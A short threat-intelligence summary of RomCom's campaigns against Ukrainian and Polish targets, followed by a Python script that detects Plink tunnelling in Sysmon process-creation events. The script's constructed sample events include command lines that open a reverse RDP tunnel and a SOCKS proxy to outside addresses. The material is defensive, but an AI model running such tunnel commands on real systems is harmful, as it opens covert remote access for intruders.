Russia-linked threat actor RomCom has targeted Ukrainian government agencies and Polish entities in cyber attacks since late 2023.
RomCom deployed an updated variant of the RomCom RAT called 'SingleCamper' and used two new downloaders, RustClaw and MeltingClaw, along with two backdoors, DustyHammock and ShadyHammock.
RomCom is focusing on data exfiltration from Ukrainian targets, using a variety of tools and malware written in different languages to maintain long-term espionage access.
The group employed spear-phishing messages and established remote tunnels using PuTTY's Plink tool to connect with attacker-controlled servers.
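For defenders, the Plink tunnelling mentioned above can be hunted in process-creation telemetry. The following is an added example, not code from the original report: it flags Plink invocations that request port forwarding, including renamed copies identified by the PE OriginalFileName. The event field names follow Sysmon Event ID 1, and every sample event, path, address and port is constructed for illustration.

```python
import shlex
from pathlib import PureWindowsPath

# Plink port-forwarding options: -R (remote), -L (local), -D (dynamic SOCKS).
# The flags are case-sensitive, so the command line is not lower-cased.
FORWARD_FLAGS = {"-R": "remote", "-L": "local", "-D": "dynamic"}

def is_plink(event):
    """True if the image name or the PE OriginalFileName identifies Plink."""
    image = PureWindowsPath(event.get("Image", "")).stem.lower()
    original = event.get("OriginalFileName", "").lower()
    return image == "plink" or original.startswith("plink")

def plink_tunnels(event):
    """Return (kind, forward_spec) pairs requested on a Plink command line."""
    if not is_plink(event):
        return []
    # posix=False keeps Windows backslashes intact while tokenising.
    args = shlex.split(event.get("CommandLine", ""), posix=False)
    return [(FORWARD_FLAGS[arg], args[i + 1])
            for i, arg in enumerate(args)
            if arg in FORWARD_FLAGS and i + 1 < len(args)]

def scan(events):
    """Return one alert dict per event that sets up at least one tunnel."""
    alerts = []
    for event in events:
        tunnels = plink_tunnels(event)
        if tunnels:
            alerts.append({"Image": event["Image"], "tunnels": tunnels})
    return alerts

# Constructed sample events (not taken from any real intrusion).
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\Public\plink.exe", "OriginalFileName": "Plink",
     "CommandLine": r"C:\Users\Public\plink.exe -ssh -N -R 3389:127.0.0.1:3389 user@198.51.100.7"},
    {"Image": r"C:\ProgramData\svchelper.exe", "OriginalFileName": "Plink",  # renamed copy
     "CommandLine": r"C:\ProgramData\svchelper.exe -batch -D 1080 user@203.0.113.9"},
    {"Image": r"C:\Tools\plink.exe", "OriginalFileName": "Plink",  # no forwarding requested
     "CommandLine": r'C:\Tools\plink.exe -ssh -batch admin@192.0.2.10 "uptime"'},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": r"notepad.exe -R notes.txt"},  # not Plink, ignored
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

Administrators who use Plink for legitimate forwarding will also match, so pair the result with an allowlist of expected hosts and destinations.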